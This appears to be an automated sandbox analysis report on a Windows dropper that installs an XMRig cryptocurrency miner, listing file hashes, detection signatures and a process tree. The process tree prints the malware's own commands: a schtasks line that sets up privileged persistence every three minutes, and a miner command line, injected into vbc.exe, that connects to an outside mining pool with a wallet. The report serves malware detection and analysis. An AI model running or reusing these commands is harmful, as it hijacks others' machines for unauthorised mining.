Resubmissions
10/10/2024, 04:54
241010-fjqxaaxgme 1010/10/2024, 02:37
241010-c366tsvgpc 1029/01/2024, 18:13
240129-wtq8sshdcl 10Analysis
-
max time kernel
136s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29/01/2024, 18:13
Static task
static1
Behavioral task
behavioral1
Sample
9b3430f42a0fb00d014c2fa208662865.exe
Resource
win7-20231215-en
General
-
Target
9b3430f42a0fb00d014c2fa208662865.exe
-
Size
4.8MB
-
MD5
9b3430f42a0fb00d014c2fa208662865
-
SHA1
09a16508bcc0a6da90c272daa2eff627ccd3205d
-
SHA256
8062eb6eea56d33e35ea32f6eef98636bbd66c2d177c1889c4f0a960b0d14d47
-
SHA512
d2887d08a66e10af1e89fb60f2a4f8d7bae7dc5cccc0301a70cb5ff120094c5e6247b44cf3b1b2b1c7e5d48e687319b842a721d757ebb44cf484ef766db92e29
-
SSDEEP
98304:CdlaF/1RByjAQG/Mul2rq/aReDkizMeQUh:CdYvkji/Mul2rVe4iwVUh
Malware Config
Signatures
-
XMRig Miner payload 14 IoCs
resource yara_rule behavioral2/memory/1800-23-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-24-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-26-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-27-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-28-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-29-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-30-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-31-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-32-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-34-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral2/memory/1800-40-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 3 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/3992-0-0x0000000000990000-0x0000000000E6A000-memory.dmp net_reactor behavioral2/files/0x0006000000023215-13.dat net_reactor behavioral2/files/0x0006000000023215-12.dat net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation .exe -
Executes dropped EXE 1 IoCs
pid Process 2780 .exe -
resource yara_rule behavioral2/memory/1800-18-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-21-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-20-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-23-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-26-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-27-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-30-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-34-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral2/memory/1800-40-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2780 set thread context of 1800 2780 .exe 100 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1880 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4024 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2780 .exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3992 9b3430f42a0fb00d014c2fa208662865.exe Token: SeDebugPrivilege 2780 .exe Token: SeLockMemoryPrivilege 1800 vbc.exe Token: SeLockMemoryPrivilege 1800 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1800 vbc.exe -
Suspicious use of WriteProcessMemory 17 IoCs
description pid Process procid_target PID 3992 wrote to memory of 3560 3992 9b3430f42a0fb00d014c2fa208662865.exe 87 PID 3992 wrote to memory of 3560 3992 9b3430f42a0fb00d014c2fa208662865.exe 87 PID 3560 wrote to memory of 4024 3560 cmd.exe 88 PID 3560 wrote to memory of 4024 3560 cmd.exe 88 PID 3560 wrote to memory of 2780 3560 cmd.exe 89 PID 3560 wrote to memory of 2780 3560 cmd.exe 89 PID 2780 wrote to memory of 4076 2780 .exe 91 PID 2780 wrote to memory of 4076 2780 .exe 91 PID 4076 wrote to memory of 1880 4076 cmd.exe 93 PID 4076 wrote to memory of 1880 4076 cmd.exe 93 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 PID 2780 wrote to memory of 1800 2780 .exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe"C:\Users\Admin\AppData\Local\Temp\9b3430f42a0fb00d014c2fa208662865.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp49DA.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:4024
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:1880
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1800
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
486KB
MD57a14e29eae2d9f2854edd04254a0e6c7
SHA1d2b7f4d530f6550fe171cc7be768f9a75fee31ab
SHA2560d4d780921e2a0dfab7256a1736b52897bd79880a3099d2101f96abc21e08697
SHA51258e7b8b3402efe1e44300a0021d628980e0a174f8eb1cb468947f3c5b2390add2db170b4a0d77ed55315bec8852cab8fb61cc37cdad847c7af73c44713b8a83a
-
Filesize
495KB
MD57b32894b5cce3d3e639d8edfe83b3732
SHA1061da55a51deaf0f4f77a88d17bee1b18d858ff7
SHA2566e8a4281635c01e7c5f2b19826705d544ffe5d681256c53380496b8e3438eed1
SHA51295d2abbf2c8b5ce4fb7a62484e0e579613ce2ad9b60ac530155f4f70b2b464c577f482872c145fa9b7f92120e371bf90fa591d54c0dc69805de608b9fa77f263
-
Filesize
168B
MD5087adf66381bbd31593de1b9b61f9abd
SHA106a3084c996951e7891682d53b0d129910aa0a3c
SHA25601ed5514455ca118ded2abc7267caa2f8c8837b9e384eb1e16fd557df2bbe7c8
SHA512cd20aad34814ddef12a473c98e6f0dd3857faa13517f2b3dd3e59184aa99de5c7d0003fb54f02f2c94ce551d997e4c0cad4dc40edf95aaf1610c8fabb4c109a8